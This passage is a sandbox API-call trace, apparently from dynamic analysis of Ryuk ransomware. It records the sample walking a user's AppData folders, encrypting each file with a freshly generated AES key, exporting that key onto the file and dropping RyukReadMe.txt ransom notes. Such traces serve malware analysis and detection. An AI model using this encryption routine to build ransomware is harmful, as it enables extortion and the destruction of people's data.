lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.761] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.761] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.761] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.761] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x427, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x427, lpOverlapped=0x0) returned 1 [0142.761] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.761] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x427, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x430) returned 1 [0142.761] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.761] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x430, lpOverlapped=0x0) returned 1 [0142.761] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.761] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.761] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.761] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.762] CloseHandle (hObject=0x1a0) returned 1 [0142.790] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.795] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.795] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.795] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.795] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.795] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl", dwFileAttributes=0x80) returned 1 [0142.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.796] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=585) returned 1 [0142.796] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=585) returned 1 [0142.796] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x127, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.796] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.800] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.800] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.800] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.800] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.800] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x249, lpOverlapped=0x0) returned 1 [0142.800] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.800] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x249, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x250) returned 1 [0142.800] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.800] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x250, lpOverlapped=0x0) returned 1 [0142.800] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.800] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.800] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.801] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.801] CloseHandle (hObject=0x1a0) returned 1 [0142.818] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.822] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.822] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.822] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 1 [0142.822] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.822] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl", dwFileAttributes=0x80) returned 1 [0142.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\12_all_video.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0142.822] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1c8 | out: lpFileSize=0x29aa1c8*=1079) returned 1 [0142.822] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x29aa1d8 | out: lpFileSize=0x29aa1d8*=1079) returned 1 [0142.822] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x315, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.823] ReadFile (in: hFile=0x1a0, lpBuffer=0x29aa228, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa1e8, lpOverlapped=0x0 | out: lpBuffer=0x29aa228*, lpNumberOfBytesRead=0x29aa1e8*=0x19, lpOverlapped=0x0) returned 1 [0142.824] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.824] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa1b0 | out: phKey=0x29aa1b0*=0x3b8690) returned 1 [0142.824] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.824] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.824] ReadFile (in: hFile=0x1a0, lpBuffer=0x2760000, nNumberOfBytesToRead=0x437, lpNumberOfBytesRead=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa1c0*=0x437, lpOverlapped=0x0) returned 1 [0142.824] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa1bc*=0xf4250) returned 1 [0142.824] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x437, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa1b8*=0x440) returned 1 [0142.824] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.824] WriteFile (in: hFile=0x1a0, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x29aa1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa1c0*=0x440, lpOverlapped=0x0) returned 1 [0142.824] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa200*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa200*, lpNumberOfBytesWritten=0x29aa1c4*=0x6, lpOverlapped=0x0) returned 1 [0142.824] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa1d0 | out: pbData=0x0*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.824] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aa250, pdwDataLen=0x29aa1d0 | out: pbData=0x29aa250*, pdwDataLen=0x29aa1d0*=0x10c) returned 1 [0142.824] WriteFile (in: hFile=0x1a0, lpBuffer=0x29aa250*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa1c4, lpOverlapped=0x0 | out: lpBuffer=0x29aa250*, lpNumberOfBytesWritten=0x29aa1c4*=0x10c, lpOverlapped=0x0) returned 1 [0142.824] CloseHandle (hObject=0x1a0) returned 1 [0142.841] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.845] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.845] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.845] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0142.845] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0142.845] SetLastError (dwErrCode=0x0) [0142.845] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.845] GetLastError () returned 0x0 [0142.845] WriteFile (in: hFile=0x19c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aab80, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aab80*=0x320, lpOverlapped=0x0) returned 1 [0142.846] CloseHandle (hObject=0x19c) returned 1 [0142.846] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0142.846] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0142.846] SetLastError (dwErrCode=0x0) [0142.846] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.846] GetLastError () returned 0xb7 [0142.847] CloseHandle (hObject=0x198) returned 1 [0142.847] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0142.847] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0142.850] SetLastError (dwErrCode=0x0) [0142.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.850] GetLastError () returned 0xb7 [0142.850] CloseHandle (hObject=0x194) returned 1 [0142.850] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.850] SetLastError (dwErrCode=0x0) [0142.850] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.850] GetLastError () returned 0xb7 [0142.850] CloseHandle (hObject=0x194) returned 1 [0142.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0142.851] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.851] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0142.851] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0142.851] SetLastError (dwErrCode=0x0) [0142.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Transcoded Files Cache\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\transcoded files cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.852] GetLastError () returned 0x0 [0142.852] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0142.852] CloseHandle (hObject=0x194) returned 1 [0142.853] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0142.853] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0142.853] SetLastError (dwErrCode=0x0) [0142.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0142.853] GetLastError () returned 0xb7 [0142.853] CloseHandle (hObject=0x190) returned 1 [0142.853] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0142.853] SetLastError (dwErrCode=0x0) [0142.853] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0142.853] GetLastError () returned 0xb7 [0142.853] CloseHandle (hObject=0x190) returned 1 [0142.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0142.854] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.854] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0142.854] SetLastError (dwErrCode=0x0) [0142.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0142.854] GetLastError () returned 0x0 [0142.854] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0142.855] CloseHandle (hObject=0x194) returned 1 [0142.855] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0142.856] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.856] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0142.856] SetLastError (dwErrCode=0x0) [0142.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0142.856] GetLastError () returned 0x0 [0142.856] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0142.857] CloseHandle (hObject=0x198) returned 1 [0142.857] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0142.858] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.858] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.858] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.858] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD", dwFileAttributes=0x80) returned 1 [0142.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-CNRY.FSD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\14.0\\officefilecache\\fsd-cnry.fsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0142.859] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=131072) returned 1 [0142.859] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=131072) returned 1 [0142.859] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x1fede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.859] ReadFile (in: hFile=0x19c, lpBuffer=0x29aa9d8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29aa998, lpOverlapped=0x0 | out: lpBuffer=0x29aa9d8*, lpNumberOfBytesRead=0x29aa998*=0x19, lpOverlapped=0x0) returned 1 [0142.860] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.860] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0142.860] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0142.860] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.860] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x20000, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x20000, lpOverlapped=0x0) returned 1 [0142.866] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0142.866] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x20000, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x20010) returned 1 [0142.867] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.867] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x20010, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x20010, lpOverlapped=0x0) returned 1 [0142.867] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0142.867] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0142.867] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0142.868] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0142.868] CloseHandle (hObject=0x19c) returned 1 [0142.883] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.887] CryptDestroyKey (hKey=0x3b8690) returned 1 [0142.887] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0142.887] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0142.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0142.887] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\14.0\\OfficeFileCache\\FSD-{48508C83-EC67-468F-AA1F-6F3CAF625658}.FSD", dwFileAttributes=0x80) returned 1 [0142.888] CreateFileW 